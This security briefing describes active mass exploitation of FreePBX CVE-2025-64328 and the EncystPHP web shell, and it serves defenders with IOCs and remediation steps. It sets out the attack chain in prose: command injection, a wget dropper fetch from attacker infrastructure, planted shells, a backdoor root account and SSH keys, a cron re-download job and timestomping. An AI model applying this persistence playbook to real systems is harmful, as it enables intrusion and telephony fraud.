analyst@nohacky:~/briefings$
cat/briefings/freepbx-cve-2025-64328-mass-exploitation
analyst@nohacky:~/briefings/freepbx-cve-2025-64328-mass-exploitation.html
reading mode 11 min read
category vuln
published March 2026
read_time 11 min
cve CVE-2025-64328 — CVSS 8.6
status CISA KEV / Active

FreePBX CVE-2025-64328: Mass Exploitation and the EncystPHP Web Shell

A post-authentication command injection flaw in the FreePBX Endpoint Manager has been under active mass exploitation since December 2025. The threat group INJ3CTOR3 is deploying a sophisticated PHP web shell called EncystPHP across vulnerable systems globally, with over 900 confirmed compromises as of late February 2026. A patch has existed since November 2025. Hundreds of organizations have not applied it.

FreePBX is an open-source web-based interface for managing the Asterisk telephony engine — widely deployed by businesses, MSPs, and hosted VoIP providers to run on-premises PBX infrastructure. Its broad adoption in SMB environments, combined with a history of internet-exposed administrative panels running outdated software, makes it a recurring target. This campaign follows a pattern INJ3CTOR3 has executed before, against the same class of infrastructure, with updated tooling.

The Shadowserver Foundation, in collaboration with the Canadian Centre for Cyber Security, confirmed on February 24, 2026 that over 900 FreePBX instances remain actively compromised and running web shells. CISA added CVE-2025-64328 to its Known Exploited Vulnerabilities catalog on February 3, with a federal agency remediation deadline of February 24. The campaign is ongoing.

The Vulnerability: CVE-2025-64328

CVE-2025-64328 is a CWE-78 OS command injection vulnerability — Improper Neutralization of Special Elements used in an OS Command — with a CVSS v3.1 score of 8.6 (High). It resides in the FreePBX Endpoint Manager module, specifically in the filestore module's SSH test-connection functionality.

The vulnerable code path runs through the testconnection -> check_ssh_connect() function. User-supplied input passed through this function is not properly sanitized before being incorporated into an OS command. An authenticated user with access to the FreePBX Administration Panel can craft input that injects arbitrary shell commands, which execute as the asterisk user — the system account under which the Asterisk telephony daemon runs.

affected versions

The vulnerability affects FreePBX Endpoint Manager versions 17.0.2.36 and above, up to but not including 17.0.3. The fix is available in version 17.0.3, patched by Sangoma in November 2025. Exploitation began in December 2025 — one month after the patch was available. Systems compromised during that window may remain backdoored even after patching, because EncystPHP establishes persistence independent of the original vulnerability.

The "post-authentication" qualifier has not meaningfully limited attacker reach. INJ3CTOR3 operators use automated scanners to identify internet-facing FreePBX admin panels, then attempt authentication using default credentials, previously leaked credentials, and brute force. Many FreePBX deployments retain factory-default or weak administrative passwords. The authentication step is a low barrier, not a reliable protection.

The impact is that any user with access to the FreePBX Administration panel could leverage this vulnerability to execute arbitrary shell commands on the underlying host. An attacker could leverage this to obtain remote access to the system as the asterisk user. — Sangoma / FreePBX Security Advisory, November 2025

Threat Actor: INJ3CTOR3

INJ3CTOR3 is a financially motivated threat group with a documented history of targeting VoIP and PBX infrastructure going back to at least 2020. Their operations follow a consistent template: identify an exploitable vulnerability in widely deployed telephony software, scan for exposed instances at scale, gain administrative access, deploy a PHP web shell for persistence, and monetize through outbound call fraud and unauthorized use of telephony resources.

Their campaign history shows deliberate platform targeting. In 2020 they exploited CVE-2019-19006, a critical authentication bypass in FreePBX. In 2022 they pivoted to Elastix systems via CVE-2021-45461. CVE-2025-64328 represents their third documented major campaign targeting the same ecosystem — VoIP infrastructure built on FreePBX or Elastix running the Asterisk engine. The tooling has been updated each time; the strategic target has not changed.

FortiGuard Labs confirmed attribution to INJ3CTOR3 based on overlaps with previously documented TTPs, the characteristic behavior of the EncystPHP payload, and infrastructure connections. The dropper was downloaded from the IP address 45[.]234[.]176[.]202, resolving to the domain crm[.]razatelefonia[.]pro — a site presenting as a VoIP management system, used as attacker-controlled download infrastructure.

The Attack Chain

attack chain — CVE-2025-64328 / EncystPHP
01
Reconnaissance & Target Identification
Automated scanning identifies internet-facing FreePBX admin panels running vulnerable Endpoint Manager versions. Scanners check for characteristic response patterns in the admin UI.
MITRE: T1595 (Active Scanning)
02
Authentication
Attackers authenticate using default credentials, brute-forced passwords, or previously compromised account data. Admin panel access is obtained.
MITRE: T1110 (Brute Force) / T1078 (Valid Accounts)
03
Command Injection via CVE-2025-64328
Crafted input is submitted to the SSH test-connection function in the filestore module. Unsanitized input executes as OS commands under the asterisk user. A Base64-encoded PHP payload is delivered via HTTP POST to the FreePBX web UI, written to /var/www/html/admin/views/ajax.php.
MITRE: T1190 (Exploit Public-Facing Application) / T1059 (Command and Scripting Interpreter)
04
EncystPHP Dropper Fetched
The injected command uses wget to pull the EncystPHP dropper from 45[.]234[.]176[.]202. A secondary dropper, k.php, is also retrieved from the same host. Logs are cleared immediately after download.
MITRE: T1105 (Ingress Tool Transfer)
05
Web Shell Deployment & Fortification
EncystPHP modifies permissions of legitimate FreePBX components — ajax.php and model.php — to 000, rendering them inaccessible. It harvests database credentials from /etc/freepbx.conf, deletes competing web shells found on the system, removes existing cron jobs, and purges known FreePBX user accounts including ampuser, svc_freepbx, bluej, emoadmin, and others.
MITRE: T1505.003 (Web Shell) / T1222 (File and Directory Permissions Modification) / T1070 (Indicator Removal)
06
Persistence: Privileged Account & SSH Backdoor
A root-level user account named newfpbx is created with hardcoded credentials. Multiple existing account passwords are reset to a single attacker-controlled value. An attacker SSH public key is injected into the system. SSH port 22 is confirmed open via system configuration. File timestamps on web shell instances are forged to match legitimate FreePBX files.
MITRE: T1136 (Create Account) / T1098.004 (SSH Authorized Keys) / T1070.006 (Timestomp)
07
Persistence: Multi-Stage Cron Infrastructure
A crontab entry is established that downloads the secondary dropper k.php every minute. Additional web shell instances are written to at least twelve distinct paths under /var/www/html/, including digium_phones/, rest_phones/, phones/, and freepbxphones/. Removal of any single instance does not disrupt attacker access.
MITRE: T1053.003 (Scheduled Task: Cron) / T1505.003 (Web Shell)
08
Monetization & Post-Compromise Activity
The EncystPHP "Ask Master" interface enables querying active Asterisk channels, SIP peers, and call routing configuration. Compromised systems issue unauthorized outbound calls — typically to premium-rate numbers — for toll fraud revenue. The shell also supports file system enumeration, lateral movement, and staging of additional payloads.
MITRE: T1496 (Resource Hijacking) / T1021 (Remote Services)

EncystPHP: Capability Profile

EncystPHP is a purpose-built web shell designed specifically for FreePBX and Elastix environments. Unlike generic PHP web shells, it contains telephony-specific functionality that reflects deep familiarity with the target platform.

The shell masquerades as the legitimate FreePBX file ajax.php, placed at /var/www/html/admin/views/ajax.php — a path consistent with genuine FreePBX application structure. Incoming requests are authenticated via MD5-hashed passwords compared against hardcoded hash values in the code, so only the attacker with the correct password can operate the interface. Once authenticated, it exposes an interface labeled "Ask Master" with predefined operational commands for FreePBX-specific tasks: enumerating active Asterisk channels, listing SIP peers, retrieving FreePBX and Elastix configuration files, and executing arbitrary shell commands.

The anti-forensic capability is deliberate and layered. Timestamps on deployed web shell instances are forged to match timestamps of legitimate FreePBX files, defeating simple timestamp-based integrity checks. PHP error reporting is disabled to suppress diagnostic output. The shell scans the filesystem for other PHP-based web shells — identifying them by patterns such as Base64 decode functions and PHP shell execution calls — and removes them, eliminating competition from other threat actors on the same host. Log entries are tampered with at multiple stages. The Endpoint Manager module itself may be removed post-compromise to prevent Sangoma's own detection tooling from triggering.

patching does not equal remediation

Applying the version 17.0.3 patch closes the CVE-2025-64328 attack vector but does not remove EncystPHP or any other persistence already established on a compromised system. Because EncystPHP maintains access via injected SSH keys, hardcoded accounts, cron-based dropper refresh, and distributed web shell instances across twelve or more paths, a patched but previously compromised system remains fully backdoored. Any system that was exposed during December 2025 through the present must be treated as compromised and fully audited, not simply patched.

Global Scope and Confirmed Infections

Shadowserver's February 24, 2026 data confirmed over 900 distinct FreePBX instances running active web shells. The geographic distribution reflects the global deployment of FreePBX infrastructure:

  • United States: approximately 401 confirmed instances — the largest single concentration
  • Brazil: approximately 51 instances
  • Canada: approximately 43 instances
  • Germany: approximately 40 instances
  • France: approximately 36 instances
  • Additional infections in the United Kingdom, Italy, the Netherlands, and smaller numbers distributed globally

These are confirmed, active compromises with persistent web shells still running — not merely vulnerable instances. Systems compromised and subsequently cleaned, or remaining infected without externally detectable web shells, are not reflected in this count. The actual scope of the campaign is larger.

Indicators of Compromise

The following artifacts have been confirmed by FortiGuard Labs and Shadowserver. Organizations running FreePBX should search for these indicators on any system that was internet-exposed during the affected window.

# Attacker download infrastructure
IP:     45[.]234[.]176[.]202
Domain: crm[.]razatelefonia[.]pro

# Primary web shell path
/var/www/html/admin/views/ajax.php

# Secondary dropper deployment paths (partial list)
/var/www/html/digium_phones/
/var/www/html/rest_phones/
/var/www/html/phones/
/var/www/html/freepbxphones/

# Dropper filenames
c          (initial bash dropper)
k.php      (secondary PHP dropper)
test.sh    (bash script)

# Unauthorized accounts to check for
newfpbx    (root-level, hardcoded credentials)

# FreePBX accounts deleted by EncystPHP
ampuser, svc_freepbx, freepbx_svc, bluej,
nahda, FreePBX_setup, emoadmin, nvd0rz

# Credential file accessed by attacker
/etc/freepbx.conf

# Persistence mechanism
Crontab entry fetching k.php on a one-minute interval
SSH authorized_keys modified with attacker public key

Because EncystPHP forges file timestamps, standard integrity checks against modification times are not reliable on compromised systems. Verification should use cryptographic hashing against known-good file states.

Remediation and Hardening

  1. Apply the patch: Update FreePBX Endpoint Manager to version 17.0.3 or later. Sangoma also released an emergency EDGE module fix for deployments that cannot immediately move to 17.0.3 — apply whichever is appropriate for your deployment track.
  2. Treat any exposed system as compromised: Any FreePBX instance running a vulnerable version with an internet-accessible admin panel should be fully investigated before being returned to service. Patching alone is insufficient if compromise occurred before the patch was applied.
  3. Audit and remove web shell artifacts: Check all paths listed in the IOC section. Search the entire web root for PHP files matching web shell patterns — Base64 decode calls, PHP shell execution functions, hardcoded hash values. Restore affected files from verified clean backups rather than relying on in-place scanning.
  4. Purge unauthorized accounts and SSH keys: Remove the newfpbx account and any others created during the compromise window. Rotate all credentials. Review and clean authorized_keys on the system. Confirm SSH access is restricted to known-good keys only.
  5. Remove unauthorized cron entries: Check the crontab for the web server user, root, and any other accounts. Any entry fetching remote PHP files or executing unusual commands should be removed.
  6. Restrict admin panel access at the network layer: The FreePBX Administration Panel should not be reachable from the public internet. Firewall rules should restrict access to specific, trusted source addresses or require VPN. This is not a workaround for the vulnerability — it is a baseline hardening requirement that would have prevented exploitation in the first place.
  7. Review call detail records: If compromise is confirmed, audit CDRs for unauthorized calls during the compromise window. Toll fraud losses from compromised PBX systems can accumulate quickly, particularly when outbound PSTN trunks connect to carriers billing per-call to high-cost international destinations.
  8. Monitor for ongoing activity: Watch for unauthorized outbound SIP calls, anomalous call volumes or unusual destinations, unexpected outbound connections from the PBX host, and SSH authentication from unrecognized source addresses.

VoIP and PBX infrastructure does not receive the same patching urgency as traditional IT systems in many organizations. This campaign succeeds specifically because of that gap. FreePBX is voice infrastructure, but it runs on Linux, exposes a web interface, manages user accounts, and sits on a network segment with access to telephony trunks. It requires the same patch discipline and exposure management as any other internet-facing system. INJ3CTOR3 has exploited this assumption three times now. The attack surface has not changed.

— end of briefing